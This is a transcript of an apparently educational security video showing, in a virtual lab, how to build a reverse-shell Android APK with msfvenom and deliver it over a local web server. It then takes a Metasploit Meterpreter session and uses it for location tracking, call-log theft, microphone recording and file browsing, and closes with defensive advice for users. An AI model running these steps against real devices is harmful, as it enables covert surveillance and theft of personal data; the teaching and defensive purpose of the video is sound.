What if I told you that right now someone could be listening to your conversations, reading your messages, and tracking your location through your smartphone? And what if I told you it could all happen through an app that looks completely legitimate? Welcome back to Tech Sky. In today's eye-opening video, I'm going to show you exactly how attackers can gain complete control over an Android device, and more importantly, how to protect yourself from becoming a victim. But before we dive in, I need to make something absolutely clear. Everything we're about to demonstrate today is purely for educational purposes. Using these techniques without explicit permission is not only unethical, but illegal. We're learning these methods to understand how attackers think and how to defend against them. All our demonstrations today will be performed in a controlled laboratory environment using virtual devices that we own and control. Today's video is going to be packed with detailed information, so grab your notebook. We're going to cover everything from setting up a testing environment to executing the attack, and finally learning how to protect ourselves. Before we dive into the technical demonstration, let's understand exactly what we're dealing with and why this knowledge is so crucial for protecting ourselves. When we talk about mobile phone hacking, we're referring to something far more serious than just someone guessing your password. It's the unauthorized access and control of your device, everything from reading your messages to tracking your location, or even secretly recording through your phone's microphone and camera. The methods attackers use are diverse and constantly evolving. They might deploy malware, malicious software that infects your device like a digital virus, potentially stealing your data or damaging your system. Another common technique is phishing, where attackers create convincing fake versions of trusted websites or apps to steal your sensitive information. Some attacks are even more sophisticated, like man-in-the-middle attacks. Imagine someone secretly standing between you and the person you're trying to talk to, reading and potentially changing your messages without either of you knowing. This can happen invisibly when you're using public Wi-Fi networks. Perhaps the most concerning method is social engineering, where attackers don't rely on technical skills at all. Instead, they use psychological manipulation to trick people into voluntarily giving up their information or installing malicious software. In today's demonstration, we're going to focus on a particularly dangerous combination of malware and phishing techniques targeting Android devices. We'll show you how attackers can create a malicious application and how they might trick someone into installing it. This will give us a clear understanding of just how much control an attacker could potentially gain over a compromised device. But remember, our goal here isn't to cause harm, it's to understand these threats so we can better protect ourselves and our loved ones. Now let's set up our testing environment. For this, we'll need two main components, Genymotion for our Android virtual device, and a Kali Linux machine for our testing platform. Let's start with Genymotion. Open your web browser and in the search bar type Genymotion. Click on the first official website that appears. Now, scroll down until you see a button labeled Get Started for Genymotion Desktop. Click on it. Click the Download button and choose your operating system. I'm using Windows, so I'll select the .exe version. Once you're on the download page, you'll notice two options. If you already have VirtualBox installed on your system, like I do, you'll want to choose Genymotion Desktop only. If you don't have VirtualBox, select the bundle that includes both. Since I already have VirtualBox, I'm selecting the standalone Genymotion version. The download will begin automatically. While we're waiting, let me explain why we're using Genymotion. Genymotion provides superior performance and networking capabilities, which are essential for the kind of security testing we'll be doing today. Once the download completes, double-click the installer file. Follow the installation wizard. There's nothing tricky here, just keep clicking next until the installation begins. One important note, you'll need to restart your computer after the installation completes. This is crucial for Genymotion to work properly. After restarting your computer, locate and click the Genymotion icon on your desktop. When you first launch Genymotion, you'll need to create an account. I'm going to skip the account creation process in this video since you can follow the standard registration steps, but make sure you complete this before moving forward. Once you're logged in, you'll see a screen asking you to select between personal use and business use. Since we're using the free version, select personal use. Make sure to check the terms and conditions box. Yes, I know nobody reads these, but it's important in this case. Click Next. Now we're at the main Genymotion interface. To create our virtual Android device, look for the plus button at the top of the window. Click it and you'll see a list of available Android versions. The version isn't critical for our demonstration, but I recommend choosing a recent one for better compatibility. You can customize the CPU and memory settings, but for our purposes, the default settings work fine. Click Next and then Install. This process might take a few minutes depending on your internet speed. While that's installing, let me explain what we're going to do next. Our goal is to demonstrate how attackers can create a malicious version of a legitimate app. We'll take a real app and bind it with malicious code that gives us remote access to the device. Once Genymotion installation is complete, close it and open VirtualBox. You should see your new Android virtual device listed. Start it up and wait until you see the IP Management Console message. This indicates that our virtual device is ready for use. Now reopen Genymotion and run the emulator. You'll see your virtual Android device spring to life. Before we continue, let me pause for a moment. If you haven't set up Kali Linux in VirtualBox yet, don't worry. I've created a detailed guide showing you exactly how to download and install VirtualBox and set up Kali Linux, step by step. You can find that video through the card appearing in the upper right corner of your screen right now, or through the link in the description below. Now let's switch gears and prepare our attack environment. Open your Kali Linux virtual machine. The first thing we need to do is identify our machine's IP address. Open a terminal. You can do this by clicking the terminal icon, or using the keyboard shortcut Ctrl+Alt+T. Type in the command ifconfig, and press Enter. This command, which stands for Interface Configuration, shows us all our network interfaces and their associated IP addresses. Make a note of your IP address. You'll see it listed under either ETH0 or WLAN 0, depending on whether you're using a wired or wireless connection. We'll need this IP address later. Now comes the technical part. We're going to use a tool called MS-Venom to create our malicious APK. MS-Venom is part of the Metasploit framework and it's specifically designed for creating payloads. Open a new folder where you want to save the malicious APK, and open the terminal there. Type this command in your terminal. We start with sudo MS-Venom because we need root privileges for this operation. The platform Android parameter tells MS-Venom we're targeting an Android device. We use a Java because Android apps run on Java architecture. The P flag specifies our payload, which is Android/meterpreter/reverse_TCP. This payload will create a connection back to our machine when the app is launched. The O parameter specifies where we want to save our malicious APK. Finally, we set our L host to our Kali machine's IP address and L port to 4444, which is a commonly used port for testing. Press Enter and wait for MS-Venom to generate the malicious APK. This might take a moment. While this is happening, let me explain what's going on behind the scenes. MS-Venom is creating an Android application package, APK, that contains our payload code. This payload is designed to establish a secure connection back to our attacking machine. Once the process completes, verify that our payload APK was created by typing ls in the terminal. You should see my app file in the directory listing. Now we need to make our payload accessible to our virtual Android device. We'll do this by setting up a simple web server using Python. Type Python 3m http server 80 and press Enter. This command starts a basic HTTP server on port 80, making all files in our current directory accessible via web browser. Now that our web server's running, switch over to your Android virtual device, open the browser and enter the IP address of our Kali Linux machine. You should see a directory listing that includes our MyApp APK file. Click on it to download. You might see some warnings about downloading from unknown sources. In a real device, these warnings are actually important security features, but for our demonstration, we'll proceed with the installation. Once the APK is installed, click Done, but don't open the app yet. We need to set up our listener first. Go back to your Kali Linux terminal and open a new tab. We're going to use the Metasploit Framework Console, or MSF Console for short. Type MSF Console and press Enter. This might take a moment to load. Metasploit is a comprehensive framework with many features. Once Metasploit loads, we need to configure our handler. Type use exploit/multi/handler and press Enter. This module handles incoming connections from our payload. Next, we need to set our payload to match what we used in MS-Venom. Type set payload Android/meterpreter/reverse_TCP and press Enter. Let's check what options we need to configure. Type Show Options and press Enter. You'll see that lhost isn't set, but lport is already set to 4444, the same port we specified earlier. To set lhost, type set lhost, followed by your Kali machine's IP address. Run Show Options again to verify everything is configured correctly. Now comes the exciting part. Type Run and press Enter. This starts our handler, which will wait for the target device to connect. Switch back to your Android virtual device and open our app. Watch your Metasploit console closely. Within moments you should see a message indicating that a Meterpreter session has been established. This means we now have a connection to the target device. Let's explore what we can do with this connection. At the Meterpreter prompt, type sysinfo and press Enter. This shows us detailed information about the compromised device, including its Android version and hardware details. Next, type getuid to see which user account we're running under. If you type help, it will show all the commands you can execute. You can check the complete list, which includes more powerful commands. Here we are trying some of these commands. Want to know if the device is rooted? Type check_root and press Enter. But here's where it gets really interesting. Type geolocate to get the device's physical location. Think about the implications of this. An attacker could track someone's movements without their knowledge. But wait, there's more. Type dump_call log to extract the device's call history. All this information gets saved to a file that we can examine later. We can even access the device's cameras. Type webcam_list to see available cameras. You'll typically see both front and back cameras listed. One of the most invasive capabilities is audio recording. Type record_mic D10 to record 10 seconds of audio through the device's microphone. The victim would have no idea this is happening. Let's explore the file system. Type ls to list files. Type pwd to see our current directory. And cd to navigate between directories. These basic Linux commands give us complete access to browse through the device's storage. Now, let me be very clear. All of these capabilities I've just demonstrated are why mobile security is so crucial. So how do we protect ourselves from these types of attacks? Here are the essential steps every Android user should take. First and most importantly, never install apps from unknown sources. The Google Play Store, while not perfect, has sophisticated security measures to detect malicious apps. Third-party app stores and direct downloads are much riskier. Always check app permissions carefully. If a simple app requests access to your camera, microphone, or location, ask yourself why it needs these permissions. Don't just click allowed without thinking. Keep your device updated. Many attacks exploit known vulnerabilities that are fixed in newer versions of Android. Those update notifications might be annoying, but they're crucial for security. Use a reputable mobile security solution. While they can't catch everything, they provide an extra layer of protection against known malware. Be especially wary of modified or cracked versions of popular apps. These are often used to distribute malware because users are tempted by free versions of paid apps. Monitor your device for unusual behavior. If your battery is draining unusually quickly, or you notice unexpected data usage, these could be signs of malicious activity. Regular security audits are important. Check your installed apps periodically and remove anything you don't use or don't remember installing. That concludes our demonstration for today. Remember, knowledge is power, but with that power comes responsibility.